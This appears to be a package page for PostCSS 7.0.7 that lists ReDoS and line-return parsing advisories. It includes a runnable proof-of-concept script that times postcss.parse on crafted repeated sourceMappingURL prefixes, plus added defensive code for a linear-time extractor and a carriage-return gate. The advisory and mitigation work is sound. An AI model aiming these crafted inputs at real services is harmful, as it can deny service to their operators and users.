PostCSS version 7.0.7 is a patch release in the 7.x branch of this tool for transforming CSS with JavaScript plugins. It builds on 7.0.6 with incremental refinements rather than new functionality. Both versions provide the same framework for manipulating CSS and the same plugin ecosystem for tasks such as autoprefixing, adoption of future CSS syntax and code optimisation. The key dependencies, chalk for coloured terminal output, source-map for source map handling and supports-color for colour support detection, are unchanged between the two versions.
The core parsing, AST manipulation and plugin integration code is largely the same, so existing users should see no behavioural change. The visible difference is in the dist metadata: unpackedSize grows from 592637 bytes in 7.0.6 to 597437 bytes in 7.0.7, and releaseDate is updated. The size change by itself says nothing about what was fixed; consult the release notes or changelog for the specifics. Moving from 7.0.6 to 7.0.7 introduces no breaking changes and, with identical dependency versions, is unlikely to conflict with existing PostCSS plugins. It is not a security upgrade, however: 7.0.7 predates the fixes for every advisory listed below (7.0.36 for the two ReDoS issues and 8.4.31 for the line return parsing issue), so anyone feeding untrusted CSS to PostCSS should move to a fixed version rather than stop at 7.0.7.
Vulnerabilities affecting version 7.0.7 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build a string with n repeated "/*# sourceMappingURL=" prefixes and no
// closing "*/". The annotation regex must backtrack over the whole tail for
// each prefix, so parse time grows super-linearly with n.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!"
}

// Warm-up parse of a benign annotation comment.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Grow the attack string in steps of 1000 prefixes and time each parse.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now()
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    } catch (e) {
      var time_cost = Date.now() - time
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    }
  }
}
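The following is an added example, not code from PostCSS or from the advisory: it places a regex reconstructed from the sub-pattern quoted above (\/\*\s*# sourceMappingURL=(.*), with the closing \s*\*\/ assumed) next to a linear-time replacement that walks comment delimiters with lastIndexOf instead of backtracking. The exact shape of the vulnerable regex in PostCSS and the function names used here are assumptions; the attack input mirrors the PoC above.

```javascript
// Added example (not PostCSS's own code): the backtracking annotation regex
// behind the ReDoS advisory, beside a linear-time replacement.
// VULNERABLE_ANNOTATION_RE is reconstructed from the sub-pattern quoted in
// the advisory; its exact form in PostCSS is an assumption.
const VULNERABLE_ANNOTATION_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//gm;

// Same attack input as the PoC above: many "/*# sourceMappingURL=" prefixes
// and no closing "*/".
function buildAttack(n) {
  let s = 'a{}';
  for (let i = 0; i < n; i++) s += '/*# sourceMappingURL=';
  return s + '!';
}

// Vulnerable: at every "/*# sourceMappingURL=" the engine lets `.*` run to the
// end of the line, then backtracks one character at a time looking for
// `\s*\*\/`. With no "*/" present every attempt fails, so the work done is
// roughly (number of prefixes) x (length of the input).
function extractAnnotationVulnerable(css) {
  const comments = css.match(VULNERABLE_ANNOTATION_RE);
  if (!comments) return null;
  // Use the last annotation comment, as the advisory's functions do.
  const m = comments[comments.length - 1].match(/\/\*\s*# sourceMappingURL=(.*)\s*\*\//);
  return m ? m[1].trim() : null;
}

// Hardened: no regex at all. Walk the comment delimiters backwards with
// lastIndexOf (linear in the input) and return the last sourceMappingURL
// annotation. Input with no "*/" at all is rejected after a single scan.
function extractAnnotationSafe(css) {
  const marker = '# sourceMappingURL=';
  let end = css.lastIndexOf('*/');
  while (end !== -1) {
    const start = css.lastIndexOf('/*', end);
    if (start === -1) return null;
    const body = css.slice(start + 2, end).trimStart();
    if (body.startsWith(marker)) return body.slice(marker.length).trim();
    end = css.lastIndexOf('*/', start); // continue with the previous comment
  }
  return null;
}

// Wall-clock milliseconds for one call; used only by the demo below.
function timeMs(fn, input) {
  const t0 = Date.now();
  fn(input);
  return Date.now() - t0;
}

// Demo: both extractors agree on a benign stylesheet; only the regex version
// slows down as the constructed attack input grows.
const benign = 'a{}/*# sourceMappingURL=a.css.map */';
console.log('benign ->', extractAnnotationVulnerable(benign), extractAnnotationSafe(benign));
for (const n of [250, 500, 1000]) {
  const attack = buildAttack(n);
  console.log(`n=${n} len=${attack.length}: regex ${timeMs(extractAnnotationVulnerable, attack)} ms, ` +
              `safe ${timeMs(extractAnnotationSafe, attack)} ms`);
}
```

The safe version is not a drop-in reimplementation of PostCSS's annotation loader; it demonstrates the property the fix needs, that each input character is examined a bounded number of times, which a pattern of the form `\s*# ...=(.*)\s*\*\/` cannot guarantee.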
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can craft CSS so that parts of it are parsed by PostCSS as a CSS comment, yet after processing they appear in PostCSS's output inside CSS nodes (rules, declarations) despite having been inside a comment in the input. Content a linter would expect to be inert comment text can therefore reach the parsed rules.
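As an added example, not PostCSS's code and not the upstream fix, the following pre-parse gate is the kind of check a linter can run before handing untrusted CSS to PostCSS: it locates bare carriage returns, the character the advisory turns on, and normalises every line ending to "\n" so the parser sees one convention. Treating a bare "\r" as a line terminator is an assumption made for this check, not a statement about how PostCSS tokenises it; the sample input is the advisory's own example.

```javascript
// Added example (not PostCSS's own code): a pre-parse gate for untrusted CSS.
// Assumption: for this check a bare "\r" is treated as a line terminator and
// normalised to "\n"; how PostCSS itself tokenises "\r" is not modelled here.

// Return the offsets of every "\r" that is not part of a "\r\n" pair.
function findBareCarriageReturns(css) {
  const offsets = [];
  for (let i = 0; i < css.length; i++) {
    if (css[i] === '\r' && css[i + 1] !== '\n') offsets.push(i);
  }
  return offsets;
}

// Convert "\r\n" and bare "\r" to "\n".
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Gate used before parsing: either reject input containing a bare "\r"
// (default, the safe choice for a linter) or normalise it when reject=false.
function prepareUntrustedCss(css, { reject = true } = {}) {
  const bare = findBareCarriageReturns(css);
  if (bare.length && reject) {
    throw new Error(`bare \\r at offset(s) ${bare.join(', ')}; refusing to parse`);
  }
  return normalizeLineEndings(css);
}

// Constructed input: the advisory's example, with "\r" inside a value.
const sample = '@font-face{ font:(\r/*);}';
console.log('bare CR offsets:', findBareCarriageReturns(sample));
console.log('normalised:', JSON.stringify(prepareUntrustedCss(sample, { reject: false })));
try {
  prepareUntrustedCss(sample);
} catch (e) {
  console.log('rejected:', e.message);
}
```

Rejecting rather than normalising is the safer default for a linter, since the stylesheet it reports on should be byte-for-byte the one the browser will receive; normalising is appropriate only when the normalised text is also what gets shipped.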